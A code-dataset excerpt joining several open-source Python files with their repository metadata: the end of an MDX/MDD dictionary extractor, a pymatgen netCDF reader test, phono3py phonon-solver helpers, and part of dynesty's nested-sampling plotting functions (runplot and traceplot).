        print("Please specify a valid MDX/MDD file")
        # BUGFIX: previously execution fell through and crashed further
        # down; bail out with a non-zero status instead.
        sys.exit(1)

    base, ext = os.path.splitext(args.filename)

    # read mdx file
    if ext.lower() == os.path.extsep + 'mdx':
        mdx = MDX(args.filename, args.encoding, args.substyle, args.passcode)
        if type(args.filename) is unicode:
            bfname = args.filename.encode('utf-8')
        else:
            bfname = args.filename
        print('======== %s ========' % bfname)
        print('  Number of Entries : %d' % len(mdx))
        for key, value in mdx.header.items():
            print('  %s : %s' % (key, value))
    else:
        mdx = None

    # find companion mdd file
    mdd_filename = ''.join([base, os.path.extsep, 'mdd'])
    if os.path.exists(mdd_filename):
        mdd = MDD(mdd_filename, args.passcode)
        if type(mdd_filename) is unicode:
            bfname = mdd_filename.encode('utf-8')
        else:
            bfname = mdd_filename
        print('======== %s ========' % bfname)
        print('  Number of Entries : %d' % len(mdd))
        for key, value in mdd.header.items():
            print('  %s : %s' % (key, value))
    else:
        mdd = None

    if args.extract:
        # write out glossary source
        if mdx:
            output_fname = ''.join([base, os.path.extsep, 'txt'])
            tf = open(output_fname, 'wb')
            for key, value in mdx.items():
                tf.write(key)
                tf.write(b'\r\n')
                tf.write(value)
                if not value.endswith(b'\n'):
                    tf.write(b'\r\n')
                tf.write(b'</>\r\n')
            tf.close()
            # write out style
            if mdx.header.get('StyleSheet'):
                style_fname = ''.join([base, '_style', os.path.extsep, 'txt'])
                sf = open(style_fname, 'wb')
                sf.write(b'\r\n'.join(mdx.header['StyleSheet'].splitlines()))
                sf.close()
        # write out optional data files
        if mdd:
            datafolder = os.path.join(
                os.path.dirname(args.filename), args.datafolder)
            if not os.path.exists(datafolder):
                os.makedirs(datafolder)
            for key, value in mdd.items():
                fname = key.decode('utf-8').replace('\\', os.path.sep)
                dfname = datafolder + fname
                if not os.path.exists(os.path.dirname(dfname)):
                    os.makedirs(os.path.dirname(dfname))
                df = open(dfname, 'wb')
                df.write(value)
                df.close()
|
finalion/WordQuery
|
src/libs/mdict/readmdict.py
|
Python
|
gpl-3.0
| 40,280
|
[
"Octopus"
] |
b52230034ea452bf72b6df2918521a6e10561b93b22a62993ab365284d3ac3b2
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals, division, print_function
import os
import unittest
import numpy as np
from pymatgen import Structure
from pymatgen.util.testing import PymatgenTest
from pymatgen.io.abinitio import ETSF_Reader
try:
import netCDF4
except ImportError:
netCDF4 = None
_test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..", "..",
'test_files')
def ref_file(filename):
    """Build the full path to *filename* inside the shared test-files directory."""
    base = _test_dir
    return os.path.join(base, filename)
class ETSF_Reader_TestCase(PymatgenTest):
    """Tests for ETSF_Reader against a reference Si2 GSR netCDF file."""

    def setUp(self):
        # Map formula -> path of its reference GSR netCDF file.
        formulas = ["Si2",]
        self.GSR_paths = d = {}
        for formula in formulas:
            d[formula] = ref_file(formula + "_GSR.nc")

    @unittest.skipIf(netCDF4 is None, "Requires Netcdf4")
    def test_read_Si2(self):
        # Read dimensions, int/float variables and the structure from the
        # Si2 ground-state results file and compare against pinned values.
        path = self.GSR_paths["Si2"]
        ref_dims = {
            "number_of_spins": 1
        }
        ref_int_values = {
            "space_group": 227,
            "number_of_states": np.reshape([15, 15], (1,2)),
        }
        ref_float_values = {
            "etotal": -8.85911566912484,
            "primitive_vectors": np.reshape([0, 5.125, 5.125, 5.125, 0, 5.125,
                                             5.125, 5.125, 0], (3,3)),
        }
        with ETSF_Reader(path) as data:
            self.assertEqual(data.ngroups, 1)
            print(data.read_varnames())
            # Test dimensions.
            for (dimname, int_ref) in ref_dims.items():
                value = data.read_dimvalue(dimname)
                self.assert_equal(value, int_ref)
            # Test int variables
            for (varname, int_ref) in ref_int_values.items():
                value = data.read_value(varname)
                print(varname, value)
                self.assert_equal(value, int_ref)
            # Test float variables
            for (varname, float_ref) in ref_float_values.items():
                value = data.read_value(varname)
                print(varname, value)
                self.assert_almost_equal(value, float_ref)
            #assert 0
            # Reading non-existent variables or dims should raise
            # a subclass of NetcdReaderError
            with self.assertRaises(data.Error):
                data.read_value("foobar")
            with self.assertRaises(data.Error):
                data.read_dimvalue("foobar")
            # Unless default is given
            assert data.read_value("foobar", default=None) is None
            data.print_tree()
            for group in data.walk_tree():
                print("group: " + str(group))
            # Initialize pymatgen structure from GSR.
            structure = data.read_structure()
            self.assertTrue(isinstance(structure, Structure))
# Allow running this test module directly: python test_netcdf.py
if __name__ == "__main__":
    unittest.main()
|
sonium0/pymatgen
|
pymatgen/io/abinitio/tests/test_netcdf.py
|
Python
|
mit
| 2,917
|
[
"pymatgen"
] |
bf15e42a7e3cab5e24946f1235e7287242446d857ae868b8e633cb0cd6135815
|
# Copyright (C) 2020 Atsushi Togo
# All rights reserved.
#
# This file is part of phono3py.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of the phonopy project nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
def run_phonon_solver_c(dm,
                        frequencies,
                        eigenvectors,
                        phonon_done,
                        grid_points,
                        grid_address,
                        mesh,
                        frequency_conversion_factor,
                        nac_q_direction,  # in reduced coordinates
                        lapack_zheev_uplo,
                        verbose=False):
    """Solve phonons at the given grid points using the C extension.

    Results are written in place into ``frequencies``/``eigenvectors``
    and computed points are flagged in ``phonon_done``. When the
    dynamical matrix uses the Gonze NAC scheme, the dipole-dipole-removed
    force constants and the Gonze dataset are passed to C; otherwise the
    plain force constants are used and the NAC-specific arguments are
    None/0.
    """
    import phono3py._phono3py as phono3c

    (svecs,
     multiplicity,
     masses,
     rec_lattice,  # column vectors
     positions,
     born,
     nac_factor,
     dielectric) = _extract_params(dm)

    if dm.is_nac() and dm.nac_method == 'gonze':
        gonze_nac_dataset = dm.Gonze_nac_dataset
        if gonze_nac_dataset[0] is None:
            # Dataset is built lazily on first use.
            dm.make_Gonze_nac_dataset()
            gonze_nac_dataset = dm.Gonze_nac_dataset
        (gonze_fc,   # fc where the dipole-diple contribution is removed.
         dd_q0,      # second term of dipole-dipole expression.
         G_cutoff,   # Cutoff radius in reciprocal space. This will not be used.
         G_list,     # List of G points where d-d interactions are integrated.
         Lambda) = gonze_nac_dataset  # Convergence parameter
        fc = gonze_fc
    else:
        # Non-Gonze path: the d-d specific inputs are disabled.
        positions = None
        dd_q0 = None
        G_list = None
        Lambda = 0
        fc = dm.force_constants

    # The C routine requires C-contiguous uintp grid point indices.
    assert grid_points.dtype == 'uintp'
    assert grid_points.flags.c_contiguous

    fc_p2s, fc_s2p = _get_fc_elements_mapping(dm, fc)
    phono3c.phonons_at_gridpoints(
        frequencies,
        eigenvectors,
        phonon_done,
        grid_points,
        grid_address,
        np.array(mesh, dtype='intc'),
        fc,
        svecs,
        multiplicity,
        positions,
        masses,
        fc_p2s,
        fc_s2p,
        frequency_conversion_factor,
        born,
        dielectric,
        rec_lattice,
        nac_q_direction,
        nac_factor,
        dd_q0,
        G_list,
        Lambda,
        lapack_zheev_uplo)
def run_phonon_solver_py(grid_point,
                         phonon_done,
                         frequencies,
                         eigenvectors,
                         grid_address,
                         mesh,
                         dynamical_matrix,
                         frequency_conversion_factor,
                         lapack_zheev_uplo):
    """Solve phonons at one grid point in pure Python/NumPy.

    Frequencies and eigenvectors are written in place and the point is
    flagged in ``phonon_done``; a point already marked done is skipped.
    """
    idx = grid_point
    if phonon_done[idx] != 0:
        return
    phonon_done[idx] = 1

    # Reduced q-point coordinates of this grid address.
    qpt = grid_address[idx].astype('double') / mesh
    dynamical_matrix.run(qpt)
    dyn_mat = dynamical_matrix.dynamical_matrix

    vals, vecs = np.linalg.eigh(dyn_mat, UPLO=lapack_zheev_uplo)
    vals = vals.real
    # Imaginary modes (negative eigenvalues) map to negative frequencies
    # via sign(); magnitudes come from sqrt(|eigenvalue|).
    frequencies[idx] = (np.sign(vals) * np.sqrt(np.abs(vals))
                        * frequency_conversion_factor)
    eigenvectors[idx] = vecs
def _extract_params(dm):
svecs, multiplicity = dm.primitive.get_smallest_vectors()
masses = np.array(dm.primitive.masses, dtype='double')
rec_lattice = np.array(np.linalg.inv(dm.primitive.cell),
dtype='double', order='C')
positions = np.array(dm.primitive.positions, dtype='double', order='C')
if dm.is_nac():
born = dm.born
nac_factor = dm.nac_factor
dielectric = dm.dielectric_constant
else:
born = None
nac_factor = 0
dielectric = None
return (svecs,
multiplicity,
masses,
rec_lattice,
positions,
born,
nac_factor,
dielectric)
def _get_fc_elements_mapping(dm, fc):
p2s_map = dm.primitive.p2s_map
s2p_map = dm.primitive.s2p_map
if fc.shape[0] == fc.shape[1]: # full fc
fc_p2s = p2s_map
fc_s2p = s2p_map
else: # compact fc
primitive = dm.primitive
p2p_map = primitive.p2p_map
s2pp_map = np.array([p2p_map[s2p_map[i]] for i in range(len(s2p_map))],
dtype='intc')
fc_p2s = np.arange(len(p2s_map), dtype='intc')
fc_s2p = s2pp_map
return fc_p2s, fc_s2p
|
atztogo/phono3py
|
phono3py/phonon/solver.py
|
Python
|
bsd-3-clause
| 5,731
|
[
"phonopy"
] |
699d48efcf93228d3aa7cb3b4841e4524a9122c9035c81dbcb29f80d7bde8451
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
A set of built-in plotting functions to help visualize ``dynesty`` nested
sampling :class:`~dynesty.results.Results`.
"""
import logging
import warnings
import numpy as np
import matplotlib.pyplot as pl
from matplotlib.ticker import MaxNLocator, NullLocator
from matplotlib.colors import LinearSegmentedColormap, colorConverter
from matplotlib.ticker import ScalarFormatter
from scipy.ndimage import gaussian_filter as norm_kde
from scipy.stats import gaussian_kde
from .utils import resample_equal, unitcheck
from .utils import quantile as _quantile
from .utils import get_random_generator, get_nonbounded
from . import bounding
str_type = str
float_type = float
int_type = int
__all__ = [
"runplot", "traceplot", "cornerpoints", "cornerplot", "boundplot",
"cornerbound", "_hist2d"
]
def _make_subplots(fig, nx, ny, xsize, ysize):
# Setting up default plot layout.
if fig is None:
fig, axes = pl.subplots(nx, ny, figsize=(xsize, ysize))
axes = np.asarray(axes).reshape(nx, ny)
else:
fig, axes = fig
try:
axes = np.asarray(axes).reshape(nx, ny)
except ValueError:
raise ValueError("Provided axes do not match the required shape")
return fig, axes
def runplot(results,
            span=None,
            logplot=False,
            kde=True,
            nkde=1000,
            color='blue',
            plot_kwargs=None,
            label_kwargs=None,
            lnz_error=True,
            lnz_truth=None,
            truth_color='red',
            truth_kwargs=None,
            max_x_ticks=8,
            max_y_ticks=3,
            use_math_text=True,
            mark_final_live=True,
            fig=None):
    """
    Plot live points, ln(likelihood), ln(weight), and ln(evidence)
    as a function of ln(prior volume).

    Parameters
    ----------
    results : :class:`~dynesty.results.Results` instance
        A :class:`~dynesty.results.Results` instance from a nested
        sampling run.

    span : iterable with shape (4,), optional
        A list where each element is either a length-2 tuple containing
        lower and upper bounds *or* a float from `(0., 1.]` giving the
        fraction below the maximum. If a fraction is provided,
        the bounds are chosen to be equal-tailed. An example would be::

            span = [(0., 10.), 0.001, 0.2, (5., 6.)]

        Default is `(0., 1.05 * max(data))` for each element.

    logplot : bool, optional
        Whether to plot the evidence on a log scale. Default is `False`.

    kde : bool, optional
        Whether to use kernel density estimation to estimate and plot
        the PDF of the importance weights as a function of log-volume
        (as opposed to the importance weights themselves). Default is
        `True`.

    nkde : int, optional
        The number of grid points used when plotting the kernel density
        estimate. Default is `1000`.

    color : str or iterable with shape (4,), optional
        A `~matplotlib`-style color (either a single color or a different
        value for each subplot) used when plotting the lines in each subplot.
        Default is `'blue'`.

    plot_kwargs : dict, optional
        Extra keyword arguments that will be passed to `plot`.

    label_kwargs : dict, optional
        Extra keyword arguments that will be sent to the
        `~matplotlib.axes.Axes.set_xlabel` and
        `~matplotlib.axes.Axes.set_ylabel` methods.

    lnz_error : bool, optional
        Whether to plot the 1, 2, and 3-sigma approximate error bars
        derived from the ln(evidence) error approximation over the course
        of the run. Default is `True`.

    lnz_truth : float, optional
        A reference value for the evidence that will be overplotted on the
        evidence subplot if provided.

    truth_color : str or iterable with shape (ndim,), optional
        A `~matplotlib`-style color used when plotting :data:`lnz_truth`.
        Default is `'red'`.

    truth_kwargs : dict, optional
        Extra keyword arguments that will be used for plotting
        :data:`lnz_truth`.

    max_x_ticks : int, optional
        Maximum number of ticks allowed for the x axis. Default is `8`.

    max_y_ticks : int, optional
        Maximum number of ticks allowed for the y axis. Default is `3`.

    use_math_text : bool, optional
        Whether the axis tick labels for very large/small exponents should be
        displayed as powers of 10 rather than using `e`. Default is `True`.

    mark_final_live : bool, optional
        Whether to indicate the final addition of recycled live points
        (if they were added to the resulting samples) using
        a dashed vertical line. Default is `True`.

    fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
        If provided, overplot the run onto the provided figure.
        Otherwise, by default an internal figure is generated.

    Returns
    -------
    runplot : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
        Output summary plot.

    """
    # Initialize values.
    if label_kwargs is None:
        label_kwargs = dict()
    if plot_kwargs is None:
        plot_kwargs = dict()
    if truth_kwargs is None:
        truth_kwargs = dict()

    # Set defaults.
    plot_kwargs['linewidth'] = plot_kwargs.get('linewidth', 5)
    plot_kwargs['alpha'] = plot_kwargs.get('alpha', 0.7)
    truth_kwargs['linestyle'] = truth_kwargs.get('linestyle', 'solid')
    truth_kwargs['linewidth'] = truth_kwargs.get('linewidth', 3)

    # Extract results.
    niter = results['niter']  # number of iterations
    logvol = results['logvol']  # ln(prior volume)
    logl = results['logl'] - max(results['logl'])  # ln(normalized likelihood)
    logwt = results['logwt'] - results['logz'][-1]  # ln(importance weight)
    logz = results['logz']  # ln(evidence)
    logzerr = results['logzerr']  # error in ln(evidence)
    logzerr[~np.isfinite(logzerr)] = 0.
    nsamps = len(logwt)  # number of samples

    # Check whether the run was "static" or "dynamic".
    try:
        nlive = results['samples_n']
        mark_final_live = False
    except KeyError:
        nlive = np.ones(niter) * results['nlive']
        if nsamps - niter == results['nlive']:
            nlive_final = np.arange(1, results['nlive'] + 1)[::-1]
            nlive = np.append(nlive, nlive_final)

    # Check if the final set of live points were added to the results.
    if mark_final_live:
        if nsamps - niter == results['nlive']:
            live_idx = niter
        else:
            warnings.warn("The number of iterations and samples differ "
                          "by an amount that isn't the number of final "
                          "live points. `mark_final_live` has been disabled.")
            mark_final_live = False

    # Determine plotting bounds for each subplot.
    data = [nlive, np.exp(logl), np.exp(logwt), np.exp(logz)]
    if kde:
        # Derive kernel density estimate.
        wt_kde = gaussian_kde(resample_equal(-logvol, data[2]))  # KDE
        logvol_new = np.linspace(logvol[0], logvol[-1], nkde)  # resample
        data[2] = wt_kde.pdf(-logvol_new)  # evaluate KDE PDF
    if span is None:
        span = [(0., 1.05 * max(d)) for d in data]
        no_span = True
    else:
        no_span = False
        span = list(span)
        if len(span) != 4:
            raise ValueError("More bounds provided in `span` than subplots!")
        for i, _ in enumerate(span):
            try:
                ymin, ymax = span[i]
            except (TypeError, ValueError):
                # A scalar fraction was given instead of explicit bounds:
                # interpret it as a fraction below the maximum.
                span[i] = (max(data[i]) * span[i], max(data[i]))
    if lnz_error and no_span:
        if logplot:
            zspan = (np.exp(logz[-1] - 1.3 * 3. * logzerr[-1]),
                     np.exp(logz[-1] + 1.3 * 3. * logzerr[-1]))
        else:
            zspan = (0., 1.05 * np.exp(logz[-1] + 3. * logzerr[-1]))
        span[3] = zspan

    # Setting up default plot layout.
    fig, axes = _make_subplots(fig, 4, 1, 16, 16)
    axes = axes.flatten()
    xspan = [ax.get_xlim() for ax in axes]
    yspan = [ax.get_ylim() for ax in axes]
    # One exception: if the bounds are the plotting default `(0., 1.)`,
    # overwrite them.
    xspan = [t if t != (0., 1.) else (0., -min(logvol)) for t in xspan]
    yspan = [t if t != (0., 1.) else (None, None) for t in yspan]

    # Set up bounds for plotting.
    for i in range(4):
        if xspan[i][0] is None:
            xmin = None
        else:
            xmin = min(0., xspan[i][0])
        if xspan[i][1] is None:
            xmax = -min(logvol)
        else:
            xmax = max(-min(logvol), xspan[i][1])
        if yspan[i][0] is None:
            ymin = None
        else:
            ymin = min(span[i][0], yspan[i][0])
        if yspan[i][1] is None:
            ymax = span[i][1]
        else:
            ymax = max(span[i][1], yspan[i][1])
        axes[i].set_xlim([xmin, xmax])
        axes[i].set_ylim([ymin, ymax])

    # Plotting.
    labels = [
        'Live Points', 'Likelihood\n(normalized)', 'Importance\nWeight',
        'Evidence'
    ]
    if kde:
        labels[2] += ' PDF'

    for i, d in enumerate(data):

        # Establish axes.
        ax = axes[i]
        # Set color(s)/colormap(s).
        if isinstance(color, str_type):
            c = color
        else:
            c = color[i]
        # Setup axes.
        if max_x_ticks == 0:
            ax.xaxis.set_major_locator(NullLocator())
        else:
            ax.xaxis.set_major_locator(MaxNLocator(max_x_ticks))
        if max_y_ticks == 0:
            ax.yaxis.set_major_locator(NullLocator())
        else:
            ax.yaxis.set_major_locator(MaxNLocator(max_y_ticks))
        # Label axes.
        sf = ScalarFormatter(useMathText=use_math_text)
        ax.yaxis.set_major_formatter(sf)
        ax.set_xlabel(r"$-\ln X$", **label_kwargs)
        ax.set_ylabel(labels[i], **label_kwargs)
        # Plot run.
        if logplot and i == 3:
            ax.semilogy(-logvol, d, color=c, **plot_kwargs)
            # BUGFIX: query each axis (`_ax`), not the current one, when
            # refreshing the y-limits after switching to a log scale.
            yspan = [_ax.get_ylim() for _ax in axes]
        elif kde and i == 2:
            ax.plot(-logvol_new, d, color=c, **plot_kwargs)
        else:
            ax.plot(-logvol, d, color=c, **plot_kwargs)
        if i == 3 and lnz_error:
            [
                ax.fill_between(-logvol,
                                np.exp(logz + s * logzerr),
                                np.exp(logz - s * logzerr),
                                color=c,
                                alpha=0.2) for s in range(1, 4)
            ]
        # Mark addition of final live points.
        if mark_final_live:
            ax.axvline(-logvol[live_idx],
                       color=c,
                       ls="dashed",
                       lw=2,
                       **plot_kwargs)
            if i == 0:
                ax.axhline(live_idx, color=c, ls="dashed", lw=2, **plot_kwargs)
        # Add truth value(s).
        if i == 3 and lnz_truth is not None:
            ax.axhline(np.exp(lnz_truth), color=truth_color, **truth_kwargs)

    return fig, axes
def traceplot(results,
              span=None,
              quantiles=[0.025, 0.5, 0.975],
              smooth=0.02,
              thin=1,
              dims=None,
              post_color='blue',
              post_kwargs=None,
              kde=True,
              nkde=1000,
              trace_cmap='plasma',
              trace_color=None,
              trace_kwargs=None,
              connect=False,
              connect_highlight=10,
              connect_color='red',
              connect_kwargs=None,
              max_n_ticks=5,
              use_math_text=False,
              labels=None,
              label_kwargs=None,
              show_titles=False,
              title_quantiles=[0.025, 0.5, 0.975],
              title_fmt=".2f",
              title_kwargs=None,
              truths=None,
              truth_color='red',
              truth_kwargs=None,
              verbose=False,
              fig=None):
    """
    Plot traces and marginalized posteriors for each parameter.
    Parameters
    ----------
    results : :class:`~dynesty.results.Results` instance
        A :class:`~dynesty.results.Results` instance from a nested
        sampling run. **Compatible with results derived from**
        `nestle <http://kylebarbary.com/nestle/>`_.
    span : iterable with shape (ndim,), optional
        A list where each element is either a length-2 tuple containing
        lower and upper bounds or a float from `(0., 1.]` giving the
        fraction of (weighted) samples to include. If a fraction is provided,
        the bounds are chosen to be equal-tailed. An example would be::
            span = [(0., 10.), 0.95, (5., 6.)]
        Default is `0.999999426697` (5-sigma credible interval) for each
        parameter.
    quantiles : iterable, optional
        A list of fractional quantiles to overplot on the 1-D marginalized
        posteriors as vertical dashed lines. Default is `[0.025, 0.5, 0.975]`
        (the 95%/2-sigma credible interval).
    smooth : float or iterable with shape (ndim,), optional
        The standard deviation (either a single value or a different value for
        each subplot) for the Gaussian kernel used to smooth the 1-D
        marginalized posteriors, expressed as a fraction of the span.
        Default is `0.02` (2% smoothing). If an integer is provided instead,
        this will instead default to a simple (weighted) histogram with
        `bins=smooth`.
    thin : int, optional
        Thin the samples so that only each `thin`-th sample is plotted.
        Default is `1` (no thinning).
    dims : iterable of shape (ndim,), optional
        The subset of dimensions that should be plotted. If not provided,
        all dimensions will be shown.
    post_color : str or iterable with shape (ndim,), optional
        A `~matplotlib`-style color (either a single color or a different
        value for each subplot) used when plotting the histograms.
        Default is `'blue'`.
    post_kwargs : dict, optional
        Extra keyword arguments that will be used for plotting the
        marginalized 1-D posteriors.
    kde : bool, optional
        Whether to use kernel density estimation to estimate and plot
        the PDF of the importance weights as a function of log-volume
        (as opposed to the importance weights themselves). Default is
        `True`.
    nkde : int, optional
        The number of grid points used when plotting the kernel density
        estimate. Default is `1000`.
    trace_cmap : str or iterable with shape (ndim,), optional
        A `~matplotlib`-style colormap (either a single colormap or a
        different colormap for each subplot) used when plotting the traces,
        where each point is colored according to its weight. Default is
        `'plasma'`.
    trace_color : str or iterable with shape (ndim,), optional
        A `~matplotlib`-style color (either a single color or a
        different color for each subplot) used when plotting the traces.
        This overrides the `trace_cmap` option by giving all points
        the same color. Default is `None` (not used).
    trace_kwargs : dict, optional
        Extra keyword arguments that will be used for plotting the traces.
    connect : bool, optional
        Whether to draw lines connecting the paths of unique particles.
        Default is `False`.
    connect_highlight : int or iterable, optional
        If `connect=True`, highlights the paths of a specific set of
        particles. If an integer is passed, :data:`connect_highlight`
        random particle paths will be highlighted. If an iterable is passed,
        then the particle paths corresponding to the provided indices
        will be highlighted.
    connect_color : str, optional
        The color of the highlighted particle paths. Default is `'red'`.
    connect_kwargs : dict, optional
        Extra keyword arguments used for plotting particle paths.
    max_n_ticks : int, optional
        Maximum number of ticks allowed. Default is `5`.
    use_math_text : bool, optional
        Whether the axis tick labels for very large/small exponents should be
        displayed as powers of 10 rather than using `e`. Default is `False`.
    labels : iterable with shape (ndim,), optional
        A list of names for each parameter. If not provided, the default name
        used when plotting will follow :math:`x_i` style.
    label_kwargs : dict, optional
        Extra keyword arguments that will be sent to the
        `~matplotlib.axes.Axes.set_xlabel` and
        `~matplotlib.axes.Axes.set_ylabel` methods.
    show_titles : bool, optional
        Whether to display a title above each 1-D marginalized posterior
        showing the 0.5 quantile along with the upper/lower bounds associated
        with the 0.025 and 0.975 (95%/2-sigma credible interval) quantiles.
        Default is `False`.
    title_quantiles : iterable, optional
        A list of fractional quantiles to use in the title. Default is
        `[0.025, 0.5, 0.975]` (median plus 95%/2-sigma credible interval).
    title_fmt : str, optional
        The format string for the quantiles provided in the title. Default is
        `'.2f'`.
    title_kwargs : dict, optional
        Extra keyword arguments that will be sent to the
        `~matplotlib.axes.Axes.set_title` command.
    truths : iterable with shape (ndim,), optional
        A list of reference values that will be overplotted on the traces and
        marginalized 1-D posteriors as solid horizontal/vertical lines.
        Individual values can be exempt using `None`. Default is `None`.
    truth_color : str or iterable with shape (ndim,), optional
        A `~matplotlib`-style color (either a single color or a different
        value for each subplot) used when plotting `truths`.
        Default is `'red'`.
    truth_kwargs : dict, optional
        Extra keyword arguments that will be used for plotting the vertical
        and horizontal lines with `truths`.
    verbose : bool, optional
        Whether to print the values of the computed quantiles associated with
        each parameter. Default is `False`.
    fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
        If provided, overplot the traces and marginalized 1-D posteriors
        onto the provided figure. Otherwise, by default an
        internal figure is generated.
    Returns
    -------
    traceplot : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
        Output trace plot.
    """
    # Initialize values.
    if title_kwargs is None:
        title_kwargs = dict()
    if label_kwargs is None:
        label_kwargs = dict()
    if trace_kwargs is None:
        trace_kwargs = dict()
    if connect_kwargs is None:
        connect_kwargs = dict()
    if post_kwargs is None:
        post_kwargs = dict()
    if truth_kwargs is None:
        truth_kwargs = dict()
    # Set defaults.
    # NOTE: the caller-supplied kwargs dicts are mutated in place here.
    connect_kwargs['alpha'] = connect_kwargs.get('alpha', 0.7)
    post_kwargs['alpha'] = post_kwargs.get('alpha', 0.6)
    trace_kwargs['s'] = trace_kwargs.get('s', 3)
    trace_kwargs['edgecolor'] = trace_kwargs.get('edgecolor', None)
    trace_kwargs['edgecolors'] = trace_kwargs.get('edgecolors', None)
    truth_kwargs['linestyle'] = truth_kwargs.get('linestyle', 'solid')
    truth_kwargs['linewidth'] = truth_kwargs.get('linewidth', 2)
    rstate = get_random_generator()
    # Extract weighted samples.
    samples = results['samples']
    logvol = results['logvol']
    try:
        weights = np.exp(results['logwt'] - results['logz'][-1])
    except KeyError:
        weights = results['weights']
    # NOTE: `wts` below is only used to *color* the trace points; the raw
    # `weights` are still used for quantiles and the 1-D histograms.
    if kde:
        # Derive kernel density estimate.
        wt_kde = gaussian_kde(resample_equal(-logvol, weights)) # KDE
        logvol_grid = np.linspace(logvol[0], logvol[-1], nkde) # resample
        wt_grid = wt_kde.pdf(-logvol_grid) # evaluate KDE PDF
        wts = np.interp(-logvol, -logvol_grid, wt_grid) # interpolate
    else:
        wts = weights
    # Deal with 1D results. A number of extra catches are also here
    # in case users are trying to plot other results besides the `Results`
    # instance generated by `dynesty`.
    samples = np.atleast_1d(samples)
    if len(samples.shape) == 1:
        samples = np.atleast_2d(samples)
    else:
        assert len(samples.shape) == 2, "Samples must be 1- or 2-D."
        samples = samples.T
    assert samples.shape[0] <= samples.shape[1], "There are more " \
                                                 "dimensions than samples!"
    # Slice samples based on provided `dims`.
    if dims is not None:
        samples = samples[dims]
    ndim, nsamps = samples.shape
    # Check weights.
    if weights.ndim != 1:
        raise ValueError("Weights must be 1-D.")
    if nsamps != weights.shape[0]:
        raise ValueError("The number of weights and samples disagree!")
    # Check ln(volume).
    if logvol.ndim != 1:
        raise ValueError("Ln(volume)'s must be 1-D.")
    if nsamps != logvol.shape[0]:
        raise ValueError("The number of ln(volume)'s and samples disagree!")
    # Check sample IDs.
    if connect:
        if 'samples_id' in results.keys():
            samples_id = results['samples_id']
            uid = np.unique(samples_id)
        else:
            raise ValueError("Sample IDs are not defined!")
        # If `connect_highlight` is index-able, treat it as an explicit set
        # of particle IDs; otherwise it is an integer count, so draw that
        # many unique IDs at random.
        try:
            ids = connect_highlight[0]
            ids = connect_highlight
        except:
            ids = rstate.choice(uid, size=connect_highlight, replace=False)
    # Determine plotting bounds for marginalized 1-D posteriors.
    if span is None:
        span = [0.999999426697 for i in range(ndim)]
    span = list(span)
    if len(span) != ndim:
        raise ValueError("Dimension mismatch between samples and span.")
    for i, _ in enumerate(span):
        try:
            xmin, xmax = span[i]
        except:
            # A scalar entry is a credible-interval fraction; convert it
            # into explicit (lower, upper) bounds via weighted quantiles.
            q = [0.5 - 0.5 * span[i], 0.5 + 0.5 * span[i]]
            span[i] = _quantile(samples[i], q, weights=weights)
    # Setting up labels.
    if labels is None:
        labels = [r"$x_{" + str(i + 1) + "}$" for i in range(ndim)]
    # Setting up smoothing.
    if (isinstance(smooth, int_type) or isinstance(smooth, float_type)):
        smooth = [smooth for i in range(ndim)]
    # Setting up default plot layout.
    fig, axes = _make_subplots(fig, ndim, 2, 12, 3 * ndim)
    # Plotting.
    for i, x in enumerate(samples):
        # Plot trace.
        # Establish axes.
        if np.shape(samples)[0] == 1:
            # NOTE(review): in the 1-D case the trace panel is drawn on
            # axes[1], while the multi-D case uses column 0 (and vice versa
            # for the posterior below) -- confirm the intended panel order.
            ax = axes[1]
        else:
            ax = axes[i, 0]
        # Set color(s)/colormap(s).
        if trace_color is not None:
            if isinstance(trace_color, str_type):
                color = trace_color
            else:
                color = trace_color[i]
        else:
            # Color each (thinned) point by its importance weight.
            color = wts[::thin]
        if isinstance(trace_cmap, str_type):
            cmap = trace_cmap
        else:
            cmap = trace_cmap[i]
        # Setup axes.
        ax.set_xlim([0., -min(logvol)])
        ax.set_ylim([min(x), max(x)])
        if max_n_ticks == 0:
            ax.xaxis.set_major_locator(NullLocator())
            ax.yaxis.set_major_locator(NullLocator())
        else:
            ax.xaxis.set_major_locator(MaxNLocator(max_n_ticks))
            ax.yaxis.set_major_locator(MaxNLocator(max_n_ticks))
        # Label axes.
        sf = ScalarFormatter(useMathText=use_math_text)
        ax.yaxis.set_major_formatter(sf)
        ax.set_xlabel(r"$-\ln X$", **label_kwargs)
        ax.set_ylabel(labels[i], **label_kwargs)
        # Generate scatter plot.
        ax.scatter(-logvol[::thin],
                   x[::thin],
                   c=color,
                   cmap=cmap,
                   **trace_kwargs)
        if connect:
            # Add lines highlighting specific particle paths.
            for j in ids:
                sel = (samples_id[::thin] == j)
